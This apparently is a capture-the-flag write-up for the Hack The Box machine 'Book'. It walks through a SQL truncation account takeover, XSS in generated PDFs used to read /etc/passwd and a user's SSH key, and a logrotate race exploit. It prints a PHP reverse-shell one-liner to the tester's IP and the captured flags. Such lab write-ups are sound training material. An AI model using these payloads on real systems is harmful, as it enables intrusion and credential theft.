Notoriety wasn’t as good as fame, but was heaps better than obscurity.
In this post, I’m writing a write-up for the machine Book from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills
Book is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.
Through the login page on
http://10.10.10.176, there is a possibility to register a new user account. The results of a wfuzz scan on port
80/tcp, shows that there is a hidden directory, named
admin. On the account creation, I can create a user account and the
admin account can be taken over by performing a SQL Truncate attack.
After logging in on the portal with the user account I’m able to submit new books. The submission need to be reviewed by the administrator. The author field is vulnerable to Cross-site Scripting attacks, through this way I’m able to get the private key for the user
reader and create an SSH session to get the
After getting the user flag, I found that logrotate version 3.11.0 is being used on this machine. In this version there is that the race condition in logrotate can be abused to elevate privileges to root. I scored a reverse shell to my machine as root.
Port scan with Nmap
As always I start this box with a portscan, I save the output of the scan to a file.
1 nmap -sC -sV -oA ./nmap/book.txt 10.10.10.176
The output of the portscan.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-02 13:46 EST Nmap scan report for 10.10.10.176 Host is up (1.3s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA) | 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA) |_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: LIBRARY - Read | Learn | Have Fun Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.19 seconds
I have two open ports found on this box.
- 22/tcp (SSH)
- 80/tcp (HTTP)
Enumeration Web Server
I start with the enumeration of the webserver. I visited the website hosted on port 80 through the URL
http://10.10.10.176. I landed on a fancy looking login page.
There is not more information on this web page. I ended up registering my account on this website.
And sign in. Now, I got redirected to
http://10.10.10.176/home.php. The first thing that stands out is a nice phrase above the navigation menu:
If you have a Garden and a Library, you have everything you needed? What has this to say to me? On the right side of the navigation bar, I see that I’m now logged in as the user test. I can logout and login back again. So, my account credentials are kept save in a database somewhere. It seems that this website is belonging to a library.
Let’s poke some around on this website and let’s see if I can hack me into this server. Maybe we can score a shell? There are some books listed on the Books page. After clicking in the images a PDF-file is downloading. At the collections page, I see that I can submit a book to the library. On the Contact Us page, the message will be delivered to [email protected]. **Let’s go further with wfuzz and try to find some hidden pages.
1 wfuzz -c -w /usr/share/wordlists/dirb/common.txt --hc 404 http://10.10.10.176/FUZZ
The output of wfuzz.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.176/FUZZ Total requests: 4614 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000001: 200 321 L 683 W 6800 Ch "" 000000011: 403 9 L 28 W 277 Ch ".hta" 000000012: 403 9 L 28 W 277 Ch ".htaccess" 000000013: 403 9 L 28 W 277 Ch ".htpasswd" 000000286: 301 9 L 28 W 312 Ch "admin" 000001319: 301 9 L 28 W 311 Ch "docs" 000001991: 301 9 L 28 W 313 Ch "images" 000002021: 200 321 L 683 W 6800 Ch "index.php" 000003588: 403 9 L 28 W 277 Ch "server-status" Total time: 45.35726 Processed Requests: 4614 Filtered Requests: 4605 Requests/sec.: 101.7257
I have got something. There are some hidden directories found. Only the page
admin is working, access to the other pages is prohibited. I visited the page
http://10.10.10.167/admin. Again, there is a login page. This page is slightly different because this is the admin login. As I already know the e-mail address of the admin-account is
[email protected], I can try to log in to his account, by guessing the password.
SQL Truncate attack
Now, things are gonna be interesting. I’m going back to the page
http://10.10.10.176 and register an account and only filled in the Name and leave the e-mail address blank and click on the ‘Sign Up’ button. There is an error message popping up and shows a message that the e-mail address field should not be more than 20 characters.
This makes this login page vulnerable for SQL Truncation attack. I registered a new user account, with these credentials:
|E-mail address:||[email protected] A (with the A 21 characters)|
After filling in these credentials, I changed the input type of the E-mail ‘field’ from
text to prevent an error that the e-mail address is invalid due to the spaces in this field. After this change, I click in
My account is created. I have now taken over the
[email protected] account! I’m now able to log in as
[email protected] through the Admin Panel.
Collections page, I found the uploaded PDF-files. The uploaded file gots uploaded to the
/Docs directory, I have already found that this directory exists, through by fuzzing the directories. As the URL from the PDF-file is pointing to
http://book.htb/Docs/.pdf I need to edit the hosts’ file and add
10.10.10.76 with a pointer to
1 2 3 4 ~$ sudo nano /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali 10.10.10.176 book.htb
Save this file and I’m done. If I ping now to book.htb it resolves to the IP-address of this box.
1 2 3 4 5 6 ~$ ping book.htb PING book.htb (10.10.10.176) 56(84) bytes of data. 64 bytes from book.htb (10.10.10.176): icmp_seq=1 ttl=63 time=296 ms 64 bytes from book.htb (10.10.10.176): icmp_seq=2 ttl=63 time=375 ms 64 bytes from book.htb (10.10.10.176): icmp_seq=3 ttl=63 time=96.4 ms 64 bytes from book.htb (10.10.10.176): icmp_seq=4 ttl=63 time=110 ms
I’m now able to load the uploaded PDF-files. Ok, proceed to the next step.
From XXS to LFI
It takes me a lot of time to get through this step. First, I’ve tried some payloads in PDF-files and then uploading those files to try to get a reverse shell, but that’s not gonna work. After some hours I found out, that this website is vulnerable to Coss-site Scripting (XSS). I’ve found this vulnerability on the
Collections page. The Author field is vulnerable to XSS.
I have created a new text-file, with the name
testfile.txt. In this directory I have started Python’s
SimpleHTTPserver and logged in as the user and uploaded a dummy PDF, I have only changed the author to test Cross-site Scripting.
And clicked on
On my webserver, I see that the script got executed. An HTTP GET request comes in on my webserver, I have just found an XSS vulnerability.
1 2 3 ~$ python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... 10.10.10.176 - - [07/Mar/2020 20:05:58] "GET /testfile.txt HTTP/1.1" 200 -
Ok, I have found the vulnerability. Now, I need to find a way to exploit this vulnerability. After some search online on the internet I found this article: Local File Read via XSS in Dynamically Generated PDF. After I read this article I give these a try.
I started by adding the script below to the Author field, by submitting a new book.
http://book.htb/admin/collections.php?type=collections=<img src=x onerror=document.write('aaaa')>
After submitting this book, I logged in as the admin and opened the PDF-link with all the submitted books on the Collections page. Instead of seeing the submitted books; I see the output of my script above. It works!
Now, let’s try to get the
/etc/passwd file. With this file, I can see the user accounts this box contains. I added the script below to the Author field.
I checked again the admin account and I got now an overview of all of the user accounts are available in the system.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www- data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd- network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd- resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin reader:x:1000:1000:reader:/home/reader:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
This box contains several user accounts. The account ‘reader’ is not a default account for a Linux machine and this account has /bin/bash as his shell. I’m going to chase his private key now. With this script, I got the private key from the user reader.
There’s just one problem. The Document Viewer does not show all the rules completely. So the private key is not complete. I finally got the tip to open this private key from Google Chrome, the PDF-viewer in Google Chrome does not have this limitation.
SSH shell as reader
I copied this key from Google Chrome to a new file with the name
id_rsa and created a SSH shell as the user reader to this box and grabbed the
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ~$ ssh [email protected] -i id_rsa Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Tue Mar 10 22:29:50 UTC 2020 System load: 0.06 Processes: 153 Usage of /: 26.9% of 19.56GB Users logged in: 1 Memory usage: 23% IP address for ens33: 10.10.10.176 Swap usage: 0% * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 114 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Tue Mar 10 21:46:59 2020 from 10.10.15.91 [email protected]:~$ ls backups lse.sh user.txt [email protected]:~$ cat user.txt 51c1d4b5197fa30e3e5d37f8778f95bc [email protected]:~$
The next step is to do a privilege escalation to root. I need first starting the enumeration phase. At first, there are interesting files to see in this box. I have checked some directories and also the home directory /home/reader does not contain any interesting. I decided to check the processes. Maybe there is a process running as the user root which I can exploit.
I’m learning a lot of techniques and tools from IppSec . You’re gonna have to follow him. His write-ups are full of explanations. This is good for your learning curve. In his write-up from the box
Teacher, I have learned the tool
pspy. This tool can monitor Linux processes without the need of root permissions. So, I decided to give this tool also a change in this box.
I cloned this tool from the Github => https://github.com/DominicBreuker/pspy.
1 2 3 4 5 6 ~$ sudo git clone https://github.com/DominicBreuker/pspy Cloning into 'pspy'... remote: Enumerating objects: 1026, done. remote: Total 1026 (delta 0), reused 0 (delta 0), pack-reused 1026 Receiving objects: 100% (1026/1026), 9.26 MiB | 1.64 MiB/s, done. Resolving deltas: 100% (452/452), done.
This tool is using to programming language Go. I need first installing this language in Kali.
1 2 3 4 5 6 7 8 9 10 11 12 13 ~$ sudo apt-get install golang Reading package lists... Done Building dependency tree Reading state information... Done The following additional packages will be installed: golang-1.13 golang-1.13-doc golang-1.13-go golang-1.13-src golang-doc golang-go golang-src pkg-config Suggested packages: bzr | brz mercurial The following NEW packages will be installed: golang golang-1.13 golang-1.13-doc golang-1.13-go golang-1.13-src golang-doc golang-go golang-src pkg-config 0 upgraded, 9 newly installed, 0 to remove and 0 not upgraded. Need to get 62.9 MB of archives. After this operation, 322 MB of additional disk space will be used.
I need to do some preperations before this tool can be used. I need the CPU architecture of the target machine. This box is a x64-bits machine. I can check the architecture with the command
1 2 [email protected]:~$ uname -a Linux book 5.4.1-050401-generic #201911290555 SMP Fri Nov 29 11:03:47 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
After cloning the repository there is an additional tool to be downloaded into the directory of
pspy, which I have cloned from Github.
1 /pspy$ go get github.com/dominicbreuker/pspy/cmd
I have got now everything in place, so I can start building pspy.
1 2 3 /pspy$ GOOS=linux GOARCH=amd64 go build /pspy$ ls cmd docker Gopkg.lock Gopkg.toml images internal LICENSE main.go Makefile pspy README.md vendor
I have now
pspy listed in my directory. I have created the folder
http in my working directory and copied pspy to this directory and started
SimpleHTTPServer, so that I can drop this program on the box.
1 2 3 /pspy$ sudo cp pspy ../http/ /pspy$ cd ../http/ /http$ python -m SimpleHTTPServer 8000
I’m still logged in as the user reader through SSH and downloaded this tool to this box and make sure that I can run this tool on the box with
1 2 3 4 5 6 7 8 9 10 11 12 [email protected]:~$ wget http://10.10.16.20:8000/pspy --2020-03-14 15:31:13-- http://10.10.16.20:8000/pspy Connecting to 10.10.16.20:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 4356058 (4.2M) [application/octet-stream] Saving to: ‘pspy’ pspy 100%[=======================================================================================================================================>] 4.15M 138KB/s in 39s 2020-03-14 15:31:52 (109 KB/s) - ‘pspy’ saved [4356058/4356058] [email protected]:~$ chmod +x pspy
I have run this tool and let it run for 20 seconds and then I stop this program by pressing the
Ctrl + C command. The output is below.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [email protected]:~$ ./pspy ... 2020/03/14 20:37:22 CMD: UID=1000 PID=9322 | /usr/sbin/apache2 -k start 2020/03/14 20:37:22 CMD: UID=1000 PID=9321 | /usr/sbin/apache2 -k start 2020/03/14 20:37:22 CMD: UID=1000 PID=9334 | node /usr/local/bin/html-pdf /var/www/html/admin/export/97437.html /var/www/html/admin/export/21241.pdf 2020/03/14 20:37:23 CMD: UID=0 PID=9340 | sleep 5 2020/03/14 20:37:25 CMD: UID=1000 PID=9342 | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/94220.html /var/www/html/admin/export/903.pdf 2020/03/14 20:37:25 CMD: UID=1000 PID=9341 | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/94220.html /var/www/html/admin/export/903.pdf 2020/03/14 20:37:25 CMD: UID=1000 PID=9348 | node /usr/local/bin/html-pdf /var/www/html/admin/export/94220.html /var/www/html/admin/export/903.pdf 2020/03/14 20:37:27 CMD: UID=1000 PID=9353 | node /usr/local/bin/html-pdf /var/www/html/admin/export/60430.html /var/www/html/admin/export/29572.pdf 2020/03/14 20:37:27 CMD: UID=1000 PID=9352 | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/60430.html /var/www/html/admin/export/29572.pdf 2020/03/14 20:37:28 CMD: UID=1000 PID=9359 | node /usr/local/bin/html-pdf /var/www/html/admin/export/60430.html /var/www/html/admin/export/29572.pdf 2020/03/14 20:37:29 CMD: UID=0 PID=9364 | /usr/sbin/logrotate -f /root/log.cfg 2020/03/14 20:37:29 CMD: UID=0 PID=9363 | /bin/sh /root/log.sh 2020/03/14 20:37:29 CMD: UID=0 PID=9365 | sleep 5 2020/03/14 20:37:30 CMD: UID=1000 PID=9367 | node /usr/local/bin/html-pdf /var/www/html/admin/export/34091.html /var/www/html/admin/export/3054.pdf 2020/03/14 20:37:30 CMD: UID=1000 PID=9366 | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/34091.html /var/www/html/admin/export/3054.pdf 2020/03/14 20:37:30 CMD: UID=1000 PID=9373 | node /usr/local/bin/html-pdf /var/www/html/admin/export/34091.html /var/www/html/admin/export/3054.pdf 2020/03/14 20:37:34 CMD: UID=0 PID=9378 | /usr/sbin/logrotate -f /root/log.cfg 2020/03/14 20:37:34 CMD: UID=0 PID=9377 | /bin/sh /root/log.sh 2020/03/14 20:37:34 CMD: UID=0 PID=9379 | sleep 5 2020/03/14 20:37:34 CMD: UID=1000 PID=9380 | /usr/sbin/apache2 -k start 2020/03/14 20:37:34 CMD: UID=0 PID=9384 | /bin/sh /root/log.sh 2020/03/14 20:37:34 CMD: UID=0 PID=9383 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9382 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9381 | /bin/sh /root/log.sh 2020/03/14 20:37:34 CMD: UID=0 PID=9387 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9386 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9385 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9392 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9391 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9390 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9389 | /lib/systemd/systemd-udevd 2020/03/14 20:37:34 CMD: UID=0 PID=9388 | /lib/systemd/systemd-udevd 2020/03/14 20:37:37 CMD: UID=1000 PID=9395 | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/74920.html /var/www/html/admin/export/75474.pdf 2020/03/14 20:37:37 CMD: UID=1000 PID=9394 | sh -c /usr/local/bin/html-pdf /var/www/html/admin/export/74920.html /var/www/html/admin/export/75474.pdf 2020/03/14 20:37:37 CMD: UID=1000 PID=9393 | /usr/sbin/apache2 -k start 2020/03/14 20:37:37 CMD: UID=1000 PID=9401 | node /usr/local/bin/html-pdf /var/www/html/admin/export/74920.html /var/www/html/admin/export/75474.pdf ^CExiting program... (interrupt) [email protected]:~$
I can see that logrotate is running. Let’s check which version of logrotate is using.
1 2 [email protected]:~$ logrotate --version logrotate 3.11
I found that there is a vulnerability in this version: https://www.exploit-db.com/exploits/47466.
Create payload and exploit logrotten
First, I need to compile this program.
1 ~$ gcc -o logrotten logrotten.c
SimpleHTTPServer from Python, I’ve downloaded the
logrotten folder with the compiled program to the box and configured the right permissions to access the program.
1 2 3 [email protected]:~$ wget 10.10.15.233:8000/logrotten/ -r -np -R "index.html" [email protected]:~$ cd logrotten/ [email protected]:~/logrotten$ chmod +x logrotten.c
Now, I need to create a payload. I the logrotten folder I’ve created a file named
payloadfile and with a reverse shell to my box.
1 2 3 [email protected]:~/logrotten$ nano payloadfile [email protected]:~/logrotten$ cat payloadfile php -r '$sock=fsockopen("10.10.15.233",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Everything is now set up, I can exploit logrotten to score a reverse shell with root permissions. I started the exploit with this command.
1 [email protected]:~/logrotten$ ./logrotten -p ./payloadfile /home/reader/backups/access.log
With a second SSH session I write some lines of text to
/home/reader/backups/access.log to trigger the logrotate and a reverse shell is being established. The reverse shell is not stable, it seems that there is a scheduled disconnect configured. After the session hung up, there is a new session being created and I can perform a cat on the root flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 connect to [10.10.15.233] from book.htb [10.10.10.176] 53664 # ls clean_backup.sh clean.sh cron_root log.cfg log.sh reset.sh root.txt # Hangup [email protected]:~$ netcat -lvp 4444 listening on [any] 4444 ... connect to [10.10.15.233] from book.htb [10.10.10.176] 53680 # cat roo Hangup [email protected]:~$ netcat -lvp 4444 listening on [any] 4444 ... connect to [10.10.15.233] from book.htb [10.10.10.176] 53694 # cat root.txt 84da92adf998a1c7231297f70dd89714 # Hangup
Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!
Happy Hacking :-)